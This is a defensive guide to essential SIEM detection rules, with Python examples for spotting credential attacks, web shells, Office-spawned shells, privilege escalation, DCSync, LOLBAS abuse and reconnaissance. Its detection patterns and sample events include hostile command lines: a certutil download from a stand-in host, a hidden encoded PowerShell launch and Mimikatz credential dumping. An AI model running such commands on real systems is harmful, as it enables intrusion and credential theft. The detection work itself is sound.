Essential SIEM Rules to Start With

This list deliberately leaves out rules for activity outside business hours, password policy modification, and other events that do not contribute to real-time threat detection.


Credential-Based Attacks

Detect brute-force attacks (repeated failed logins to a single account) and password spraying (one password tested across many accounts).

Why: Common initial access vectors due to weak credentials.

Coverage:

  • OS/Apps: Windows (AD), Linux, cloud services (AWS/Azure).

  • Events: Logon failures (Windows Event ID 4625), successful logons (ID 4624), Linux audit records (USER_LOGIN/USER_START).

  • Logic: Threshold-based alerts (e.g., ≥5 failed logins/minute from a single IP).

Improvements:

  • Trigger alerts for successful logins after multiple failures.

  • Differentiate brute-force (single account) vs. spraying (multiple accounts).

  • Reduce false positives:

    • Exclude service accounts with expired passwords.

    • Split by application type (e.g., email clients often trigger false alerts).
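The threshold logic above, with the two improvements that matter most (brute force vs. spray, and a success that follows a burst of failures), as an added example that is not part of the original page. It runs over constructed Windows logon events (4625/4624); the excluded service account, the one-minute window and the threshold of five are assumptions taken from the text, not values from any product.

```python
# Added example (not from the original page): a sliding-window threshold rule
# over constructed Windows logon events (4625 = failure, 4624 = success).
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, source_ip, account)
EVENTS = [
    ("2024-05-01T10:00:01", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T10:00:05", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T10:00:09", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T10:00:14", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T10:00:20", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T10:00:31", 4624, "10.0.0.5", "alice"),       # success right after the burst
    ("2024-05-01T10:05:00", 4625, "10.0.0.9", "bob"),
    ("2024-05-01T10:05:02", 4625, "10.0.0.9", "carol"),
    ("2024-05-01T10:05:04", 4625, "10.0.0.9", "dave"),
    ("2024-05-01T10:05:06", 4625, "10.0.0.9", "erin"),
    ("2024-05-01T10:05:08", 4625, "10.0.0.9", "frank"),
    ("2024-05-01T10:30:00", 4625, "10.0.0.3", "grace"),       # one typo, stays quiet
    ("2024-05-01T11:00:00", 4625, "10.0.0.7", "svc_backup"),  # service account, expired password
    ("2024-05-01T11:00:10", 4625, "10.0.0.7", "svc_backup"),
    ("2024-05-01T11:00:20", 4625, "10.0.0.7", "svc_backup"),
    ("2024-05-01T11:00:30", 4625, "10.0.0.7", "svc_backup"),
    ("2024-05-01T11:00:40", 4625, "10.0.0.7", "svc_backup"),
]

# Assumed tuning values: accounts known to have expired passwords, and the
# ">=5 failed logins per minute from one IP" threshold from the text.
EXCLUDED_ACCOUNTS = {"svc_backup"}
WINDOW = timedelta(minutes=1)
THRESHOLD = 5


def classify(events, window=WINDOW, threshold=THRESHOLD, exclude=EXCLUDED_ACCOUNTS):
    """Return sorted (alert_type, source_ip, subject) tuples.

    alert_type is 'brute_force' (one account), 'password_spray' (many accounts)
    or 'success_after_failures'; subject is the account, or '*' for a spray.
    """
    parsed = sorted(
        (datetime.fromisoformat(ts), eid, ip, acct)
        for ts, eid, ip, acct in events
        if acct not in exclude
    )
    failures = defaultdict(list)  # source_ip -> [(timestamp, account)] still inside the window
    alerts = set()
    for ts, eid, ip, acct in parsed:
        # drop failures that have aged out of the sliding window
        failures[ip] = [(t, a) for t, a in failures[ip] if ts - t <= window]
        if eid == 4625:
            failures[ip].append((ts, acct))
            if len(failures[ip]) >= threshold:
                accounts = {a for _, a in failures[ip]}
                if len(accounts) == 1:
                    alerts.add(("brute_force", ip, acct))
                else:
                    alerts.add(("password_spray", ip, "*"))
        elif eid == 4624:
            # a success is only interesting when this account just failed repeatedly
            same_account = [a for _, a in failures[ip] if a == acct]
            if len(same_account) >= threshold:
                alerts.add(("success_after_failures", ip, acct))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in classify(EVENTS):
        print(alert)
```

Grouping by source IP rather than by account is what makes the spray visible: per account, each of bob, carol, dave, erin and frank has a single harmless failure. Splitting by application type, as the text suggests, is a matter of adding the logon type or source application to the grouping key.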


Remote Code Execution (RCE)

Detect exploitation of code execution vulnerabilities, regardless of the specific CVE.

Coverage:

  • OS: Windows, Linux.

  • Events: Process creation (Windows Event ID 4688, Sysmon Event ID 1/11; Linux execve/open syscalls).

  • Logic:

    • Suspicious parent-child process chains (e.g., w3wp.exe → cmd.exe).

    • Code execution by service accounts (e.g., www-data, apache).

    • Web-shell creation in web directories (e.g., .php, .aspx files).

Improvements:

  • Use whitelists for legitimate application behaviors.

  • Split into sub-rules:

    1. Abnormal process sequences.

    2. Service account anomalies.

    3. Web-shell file creation.


Phishing Payload Execution

Focus on post-exploitation behavior rather than email analysis.

Coverage:

  • OS: Windows.

  • Events: Process creation (Event ID 4688, Sysmon 1).

  • Logic:

    • Office apps (e.g., winword.exe) spawning shells (cmd.exe, powershell.exe).

    • Processes downloading/executing external payloads.

Limitations:

  • Misses password-protected ZIP/RAR payloads.

  • Bypassed via indirect execution (e.g., some macros break the process chain).

Improvements:

  • Monitor Office apps writing executables to disk.
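The RCE and phishing rules above are the same mechanism, a parent-child check on process-creation events plus a file-creation check, so one added example serves both. It is not code from the original page; it evaluates constructed Sysmon-style events (Event ID 1 for process creation, 11 for file creation) and the process lists, web roots, service-account prefixes and the single allow-list entry are assumptions to be replaced with values from your own environment.

```python
# Added example (not from the original page): parent-child and file-write rules
# for the RCE and phishing-payload sections, run over constructed Sysmon events.
import ntpath
import re

# Assumed reference sets; ntpath is used because it splits on both "\" and "/"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "sh", "bash"}
WEB_SERVERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "apache2", "httpd", "nginx", "php-fpm"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SERVICE_USERS = ("iis apppool\\", "nt authority\\network service", "www-data", "apache")
WEB_ROOTS = ("c:\\inetpub\\wwwroot", "/var/www")
WEBSHELL_EXT = {".php", ".aspx", ".asp", ".jsp", ".ashx"}
EXEC_EXT = {".exe", ".dll", ".scr", ".hta", ".js", ".vbs"}
DEPLOY_TOOLS = {"msdeploy.exe", "git.exe", "git"}          # legitimate writers of web content
# Allow-list entry (constructed): a known add-in updater is allowed to spawn cmd.exe from Word
ALLOWLIST = {
    ("winword.exe", "cmd.exe"): re.compile(r'/c "C:\\Program Files\\Contoso\\addin_update\.bat"', re.I),
}


def base(path):
    return ntpath.basename(path).lower()


def ext(path):
    return ntpath.splitext(path)[1].lower()


def evaluate(event):
    """Return the list of rule names the event triggers (empty when benign)."""
    hits = []
    if event["event_id"] == 1:
        parent, child = base(event["parent_image"]), base(event["image"])
        user = event.get("user", "").lower()
        if child not in SHELLS:
            return hits
        allowed = ALLOWLIST.get((parent, child))
        if allowed and allowed.search(event.get("cmdline", "")):
            return hits                                  # whitelisted behaviour
        if parent in WEB_SERVERS:
            hits.append("rce_webserver_spawns_shell")
        if parent in OFFICE_APPS:
            hits.append("phish_office_spawns_shell")
        if user.startswith(SERVICE_USERS):
            hits.append("rce_service_account_exec")
    elif event["event_id"] == 11:
        target, writer = event["target"], base(event["image"])
        in_webroot = target.lower().startswith(WEB_ROOTS)
        if in_webroot and ext(target) in WEBSHELL_EXT and writer not in DEPLOY_TOOLS:
            hits.append("rce_webshell_written")
        if writer in OFFICE_APPS and ext(target) in EXEC_EXT:
            hits.append("phish_office_drops_executable")
    return hits


# Constructed sample events
EVENTS = [
    {"id": 1, "event_id": 1, "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "user": "IIS APPPOOL\\DefaultAppPool", "cmdline": "cmd.exe /c whoami"},
    {"id": 2, "event_id": 1, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
    {"id": 3, "event_id": 1, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\cmd.exe", "user": "CORP\\jdoe",
     "cmdline": 'cmd.exe /c "C:\\Program Files\\Contoso\\addin_update.bat"'},
    {"id": 4, "event_id": 11, "image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "target": "C:\\inetpub\\wwwroot\\uploads\\img.aspx"},
    {"id": 5, "event_id": 11, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "target": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe"},
    {"id": 6, "event_id": 1, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "user": "CORP\\jdoe", "cmdline": "cmd.exe"},
    {"id": 7, "event_id": 11, "image": "C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe",
     "target": "C:\\inetpub\\wwwroot\\default.aspx"},
    {"id": 8, "event_id": 1, "parent_image": "/usr/sbin/apache2", "image": "/bin/sh",
     "user": "www-data", "cmdline": "sh -c id"},
]


def run(events):
    return [(e["id"], evaluate(e)) for e in events]


if __name__ == "__main__":
    for event_id, hits in run(EVENTS):
        print(event_id, hits)
```

Each rule name maps to one of the sub-rules the text proposes, so the allow-list can be tuned per sub-rule instead of silencing the whole detection. The web-shell check deliberately keys on the writer process rather than on file content, since content inspection is not available in a process-creation or file-creation event.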


Privilege Escalation

Detect transitions from user to SYSTEM/root privileges.

Coverage:

  • OS: Windows.

  • Events: Process creation (Event ID 4688, Sysmon 1).

  • Logic:

    • User-context parent process spawning SYSTEM-level child (e.g., juicypotato.exe, print spooler exploits).

Unix Variant:

  • Monitor auid (original user) vs. euid=0 (root execution).

Limitations:

  • Misses privilege escalation via service creation or any other indirect execution.
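The Unix variant above (auid vs. euid) as an added example that is not part of the original page. It parses constructed auditd SYSCALL records for execve on x86_64 and flags root execution by a logged-in non-root user, while ignoring the expected route through sudo/su and the processes they start; the setuid allow-list and the parent-pid tracking are assumptions of this example.

```python
# Added example (not from the original page): auid/euid rule over constructed
# auditd SYSCALL records for execve.
import re

TOKEN = re.compile(r'(\w+)=("[^"]*"|\S+)')   # auditd "key=value" pairs, values may be quoted
AUID_UNSET = 4294967295                       # auid=-1: daemons and cron, no login session
EXECVE_X86_64 = 59                            # execve syscall number for arch=c000003e
# Assumed list of setuid helpers that legitimately take auid=N to euid=0
SETUID_ALLOW = {"/usr/bin/sudo", "/usr/bin/su", "/usr/bin/pkexec", "/usr/bin/passwd"}

# Constructed records, trimmed to the fields the rule reads
AUDIT_LINES = [
    'type=SYSCALL msg=audit(1714560000.101:5001): arch=c000003e syscall=59 success=yes exit=0 ppid=1500 pid=2001 auid=1000 uid=1000 gid=1000 euid=0 comm="sudo" exe="/usr/bin/sudo" key="exec"',
    'type=SYSCALL msg=audit(1714560000.102:5002): arch=c000003e syscall=59 success=yes exit=0 ppid=2001 pid=2002 auid=1000 uid=0 gid=0 euid=0 comm="ls" exe="/usr/bin/ls" key="exec"',
    'type=SYSCALL msg=audit(1714560000.201:5003): arch=c000003e syscall=59 success=yes exit=0 ppid=1500 pid=2003 auid=1000 uid=1000 gid=1000 euid=1000 comm="vim" exe="/usr/bin/vim" key="exec"',
    'type=SYSCALL msg=audit(1714560000.301:5004): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=2004 auid=4294967295 uid=0 gid=0 euid=0 comm="run-parts" exe="/usr/bin/run-parts" key="exec"',
    'type=SYSCALL msg=audit(1714560000.401:5005): arch=c000003e syscall=59 success=yes exit=0 ppid=1800 pid=2005 auid=0 uid=0 gid=0 euid=0 comm="bash" exe="/usr/bin/bash" key="exec"',
    'type=SYSCALL msg=audit(1714560000.501:5006): arch=c000003e syscall=59 success=yes exit=0 ppid=2900 pid=3001 auid=1000 uid=0 gid=0 euid=0 comm="bash" exe="/usr/bin/bash" key="exec"',
]


def parse(line):
    """Turn one audit record into a dict of its key=value fields."""
    return {k: v.strip('"') for k, v in TOKEN.findall(line)}


def detect_privesc(lines):
    """Return (pid, auid, exe) for each root execve by a logged-in non-root user
    that did not pass through an allow-listed setuid helper."""
    expected_root = set()   # pids of allow-listed helpers and of their descendants
    alerts = []
    for line in lines:
        f = parse(line)
        if f.get("type") != "SYSCALL" or int(f.get("syscall", -1)) != EXECVE_X86_64:
            continue
        pid, ppid = int(f["pid"]), int(f["ppid"])
        auid, euid, exe = int(f["auid"]), int(f["euid"]), f["exe"]
        if exe in SETUID_ALLOW or ppid in expected_root:
            expected_root.add(pid)       # sudo, and whatever sudo runs, is allowed to be root
            continue
        # auid=0 is an interactive root login; an unset auid is a daemon, not a user
        if euid == 0 and auid not in (0, AUID_UNSET):
            alerts.append((pid, auid, exe))
    return alerts


if __name__ == "__main__":
    for alert in detect_privesc(AUDIT_LINES):
        print(alert)
```

Record 5006 is the interesting one: a root shell whose login session belongs to uid 1000 and whose parent is neither sudo nor one of its children. As the limitations above note, a privilege escalation that goes through service creation or a cron job arrives with an unset auid and is not caught by this rule.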


DCSync Attacks

Detect unauthorized replication of AD database via Mimikatz, Impacket Secretsdump or similar tools.

Coverage:

  • OS: Windows (Active Directory).

  • Events: Directory Service replication (Event ID 4662).

  • Logic:

    • Replication requests from non-DC hosts or non-admin accounts. The logic is well known.

Improvements:

  • Monitor changes to replication-permitted groups (e.g., Domain Admins).

  • Baseline legitimate DC-to-DC replication traffic.
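The 4662 logic above as an added example that is not part of the original page. It checks constructed 4662 events for the directory replication extended-right GUIDs (the well-known DS-Replication-Get-Changes family) and suppresses the baseline callers; the DC computer accounts and the sync service account are assumed values standing in for your own baseline.

```python
# Added example (not from the original page): DCSync detection over constructed
# Windows 4662 events. Properties is the raw text the SIEM extracted from the event.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumed baseline: the DC computer accounts and one directory sync account
DOMAIN_CONTROLLERS = {"dc01$", "dc02$"}
ALLOWED_REPLICATORS = {"svc_aadconnect"}

EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "svc_aadconnect", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "Control Access {00000000-0000-0000-0000-000000000000}"},   # placeholder, unrelated right
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x10",
     "Properties": "Read Property {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},   # not a control-access request
]


def detect_dcsync(events):
    """Return one alert dict per replication request from outside the baseline."""
    alerts = []
    for e in events:
        # 0x100 = Control Access, the mask carried when an extended right is exercised
        if e.get("EventID") != 4662 or e.get("AccessMask") != "0x100":
            continue
        props = e.get("Properties", "").lower()
        rights = sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
        if not rights:
            continue
        user = e["SubjectUserName"].lower()
        if user in DOMAIN_CONTROLLERS or user in ALLOWED_REPLICATORS:
            continue
        alerts.append({
            "user": e["SubjectUserName"],
            "domain": e["SubjectDomainName"],
            "dc": e["Computer"],
            "rights": rights,
            # Get-Changes-All is the right that returns secret attributes; treat it as critical
            "severity": "critical" if "DS-Replication-Get-Changes-All" in rights else "high",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(EVENTS):
        print(alert)
```

Keeping the baseline as two explicit sets is what makes the second improvement above workable: DC-to-DC replication is suppressed by computer account, and any account added to the replication-permitted groups has to be added here consciously rather than silently widening the exclusion.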


Living Off the Land (LOLBAS/GTFOBins)

Detect abuse of trusted binaries (e.g., certutil.exe, bitsadmin).

Coverage:

  • OS: Windows, Linux.

  • Events: Process execution logs.

  • Logic:

    • Command-line patterns matching LOLBAS/GTFOBins techniques.

Improvements:


Hacking Tool Detection

Flag known security tools (e.g., Mimikatz, Cobalt Strike, Metasploit).

Coverage:

  • OS: Windows, Linux.

  • Events: Process creation, command-line arguments.

  • Logic:

    • Match process names, hashes, or command-line arguments against threat intel feeds, and match CLI patterns characteristic of frameworks such as PowerSploit and Empire.


Host Reconnaissance

Detect post-compromise discovery commands (e.g., whoami, nslookup).

Coverage:

  • OS: Windows, Linux.

  • Events: Process execution logs.

  • Logic:

    • Commands associated with TTPs from MITRE ATT&CK® TA0007.

    • Commands from Red Team cheat sheets.

Improvements:

  • Prioritize commands run by non-admin users in sensitive directories.
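The three preceding sections (living off the land, hacking tool detection, host reconnaissance) are all command-line pattern matching over process execution logs, so one added example covers them; it is not code from the original page. The pattern sets are a constructed starting point, not a complete catalogue, and the events, the five-minute window and the "three distinct discovery commands" burst threshold are assumptions. The reconnaissance rule implements the prioritisation above by raising severity for non-admin users.

```python
# Added example (not from the original page): command-line rules for LOLBAS abuse,
# known hacking tools and bursts of discovery commands, over constructed events.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed starting patterns; a production set is generated from the
# LOLBAS/GTFOBins catalogues and your threat-intel feed rather than hand-written.
LOLBAS_PATTERNS = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("certutil_decode", re.compile(r"certutil(\.exe)?\b.*-decode", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(\.exe)?\b.*/transfer", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    ("regsvr32_scrobj", re.compile(r"regsvr32(\.exe)?\b.*scrobj\.dll", re.I)),
]
HACKTOOL_PATTERNS = [
    ("mimikatz", re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)),
    ("powersploit", re.compile(r"Invoke-(Mimikatz|Kerberoast|AllChecks)", re.I)),
]
# Discovery commands (ATT&CK TA0007); "net user"/"net group" keep their subcommand
RECON_RE = re.compile(
    r'^(?:"?[^"\s]*\\)?(whoami|nslookup|systeminfo|ipconfig|tasklist|nltest|quser|hostname|net1?)'
    r'(?:\.exe)?"?(?=\s|$)(?:\s+(user|group|localgroup|view))?', re.I)
RECON_BURST = 3                      # distinct discovery commands from one user on one host
RECON_WINDOW = timedelta(minutes=5)

# Constructed events: (timestamp, host, user, user_is_admin, command_line)
EVENTS = [
    ("2024-05-01T09:00:00", "WS042", "jdoe", False, "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"),
    ("2024-05-01T09:01:00", "WS042", "jdoe", False, "whoami /all"),
    ("2024-05-01T09:01:30", "WS042", "jdoe", False, "net user"),
    ("2024-05-01T09:02:00", "WS042", "jdoe", False, "nltest /dclist:corp"),
    ("2024-05-01T09:10:00", "SRV01", "itadmin", True, "whoami"),
    ("2024-05-01T09:10:05", "SRV01", "itadmin", True, "ipconfig /all"),
    ("2024-05-01T09:20:00", "SRV02", "svc_backup", False, 'powershell.exe -c "Invoke-Mimikatz -DumpCreds"'),
    ("2024-05-01T09:30:00", "WS042", "jdoe", False, '"C:\\Program Files\\Git\\bin\\git.exe" pull'),
]


def recon_key(cmdline):
    """Normalise a discovery command to a short key, or None if it is not one."""
    m = RECON_RE.match(cmdline.strip())
    if not m:
        return None
    key = m.group(1).lower().rstrip("1")          # net1 -> net
    return f"{key} {m.group(2).lower()}" if m.group(2) else key


def analyze(events):
    """Return (category, detail, user, severity) tuples in event order."""
    alerts = []
    recent = defaultdict(list)    # (host, user) -> [(timestamp, recon_key)] inside the window
    bursted = set()
    for ts, host, user, is_admin, cmdline in sorted(events):
        t = datetime.fromisoformat(ts)
        for name, pat in LOLBAS_PATTERNS:
            if pat.search(cmdline):
                alerts.append(("lolbas", name, user, "medium"))
        for name, pat in HACKTOOL_PATTERNS:
            if pat.search(cmdline):
                alerts.append(("hacktool", name, user, "high"))
        key = recon_key(cmdline)
        if key:
            k = (host, user)
            recent[k] = [(t0, c) for t0, c in recent[k] if t - t0 <= RECON_WINDOW] + [(t, key)]
            cmds = sorted({c for _, c in recent[k]})
            if len(cmds) >= RECON_BURST and k not in bursted:
                bursted.add(k)
                # one whoami is noise; several distinct discovery commands in a row are not
                alerts.append(("recon_burst", ",".join(cmds), user, "low" if is_admin else "high"))
    return alerts


if __name__ == "__main__":
    for alert in analyze(EVENTS):
        print(alert)
```

The single-command matches (certutil, Mimikatz) alert immediately; reconnaissance is only reported as a burst of distinct commands, because whoami or ipconfig on its own is run by administrators and scripts all day. The admin pair on SRV01 never reaches three distinct commands and stays silent.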


Malicious PowerShell Activity

Detect offensive cmdlets (e.g., Invoke-Mimikatz, DownloadString).

Coverage:

  • OS: Windows.

  • Events: PowerShell script block logging (Event ID 4104) or module/cmdlet logging (Event ID 4103).

  • Logic:

    • Match cmdlets against frameworks like PowerSploit, Empire.

Improvements:

  • Flag obfuscated or encoded commands (e.g., -EncodedCommand).

  • Look for suspicious cmdlets (e.g., Invoke-WebRequest).


Key Considerations

  • Whitelisting: Exclude benign activity such as admin scripts; a rule that produces 40k alerts a day is useless.

  • Log Coverage: Ensure critical systems (DCs, cloud workloads) feed logs to the SIEM. No logs, no detections.

  • Tuning: Start broad, then refine rules using real-world data.

